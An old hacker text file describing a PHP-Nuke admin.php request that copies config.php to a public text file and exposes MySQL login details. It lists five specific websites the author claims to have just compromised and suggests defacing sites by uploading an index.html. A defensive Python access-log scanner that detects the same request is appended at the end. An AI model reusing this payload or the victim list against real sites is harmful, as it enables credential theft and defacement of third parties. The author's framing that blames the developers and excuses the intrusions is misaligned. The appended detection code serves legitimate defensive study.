PHP-Nuke, a well-known PHP-based portal system which is
used by thousands of sites on the internet, still cannot keep its security
up. They have made a lot of security fixes in the past, but a lot of sites
are not up to date on all the updates, thus becoming targets for hackers who
know PHP-Nuke's weak points.
Here is one of the security flaws, which works on some Nuke sites:
admin.php?upload=1&file=config.php&file_name=test.txt&wd%20ir=&userfile=config.php&userfile_name=test.txt
This will basically clone the config.php file as a text file on the
server. If all goes well and everything is CHMODed correctly, you will be
able to go to http://www.sitelocation.com/test.txt and view their config.php,
which contains sensitive MySQL information. It will display their MySQL
login and password in most circumstances, which 70% of the time is their root
login/pass. I took advantage of this bug and took down a lot of
sites. Here are some examples of what will happen after you clone their
config.php:
http://kauai.net/html/test.txt
http://www.pdltd.com/test.txt
http://csc.dhs.org/test.txt
http://www.spyndle.com/test.txt
http://www.camp4.com/test.txt
These are some I did a few minutes ago, just to show you how it's done.
This is a very valuable method, but at what price? Would the government
call this loophole hacking? The PHP-Nuke authors shouldn't have half-assed
their coding and allowed this to happen. They should be to blame, not us.
Here is another thing I found. If you cannot get root on the site,
there are some things you can do. If you're at the upload screen after doing
the method shown above, you can usually upload files. On most servers,
index.html will open before index.php, so for another effective method of site
defacement just upload index.html onto the server, and the web address will go
to that instead of the one with a php extension. This does tend to vary on
some servers, but I have only seen one or two where it does.
Enough.
--corrupt of Overdose
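
For site operators, the request described above leaves a recognizable trail in the web server's access log. The following is an added example, not part of the original text or of PHP-Nuke: a Python log check that flags admin.php requests carrying upload=1 with the source file named in the query string, then reports any later successful fetch of the file name the copy was written to. The log lines are constructed samples, and the rule rests on the assumption that a legitimate upload sends its file in the request body rather than naming it in the URL.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample log (Apache common log format, documentation-range IPs).
SAMPLE_LOG = """\
203.0.113.9 - - [12/Oct/2001:10:01:00 +0000] "GET /index.php HTTP/1.0" 200 5120
203.0.113.9 - - [12/Oct/2001:10:01:07 +0000] "GET /admin.php?upload=1&file=config.php&file_name=test.txt&wd%20ir=&userfile=config.php&userfile_name=test.txt HTTP/1.0" 200 812
203.0.113.9 - - [12/Oct/2001:10:01:15 +0000] "GET /test.txt HTTP/1.0" 200 1431
198.51.100.4 - - [12/Oct/2001:10:02:00 +0000] "GET /admin.php HTTP/1.0" 200 2044
198.51.100.7 - - [12/Oct/2001:10:03:00 +0000] "GET /notes.txt HTTP/1.0" 404 210
"""

# client IP, method, request target, status code
LINE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3})')


def scan(log_text):
    """Return (copy_requests, fetched_copies) found in an access log."""
    copies, fetched, watch = [], [], set()
    for line in log_text.splitlines():
        m = LINE.match(line)
        if not m:
            continue
        ip, _method, target, status = m.groups()
        url = urlsplit(target)
        q = parse_qs(url.query)
        if url.path.endswith("/admin.php") and q.get("upload") == ["1"]:
            src = (q.get("userfile") or q.get("file") or [""])[0]
            dst = (q.get("userfile_name") or q.get("file_name") or [""])[0]
            if src:  # assumption: real uploads never name the source in the URL
                copies.append((ip, src, dst))
                if dst:
                    watch.add(dst)  # remember the destination file name
        elif status == "200" and url.path.rsplit("/", 1)[-1] in watch:
            # Someone successfully retrieved a file created by a flagged request.
            fetched.append((ip, url.path))
    return copies, fetched


if __name__ == "__main__":
    copies, fetched = scan(SAMPLE_LOG)
    for ip, src, dst in copies:
        print(f"copy request from {ip}: {src} -> {dst}")
    for ip, path in fetched:
        print(f"copied file served to {ip}: {path}")
```

A hit in the second list means the database credentials in config.php should be treated as exposed and rotated, and the copied file removed from the web root.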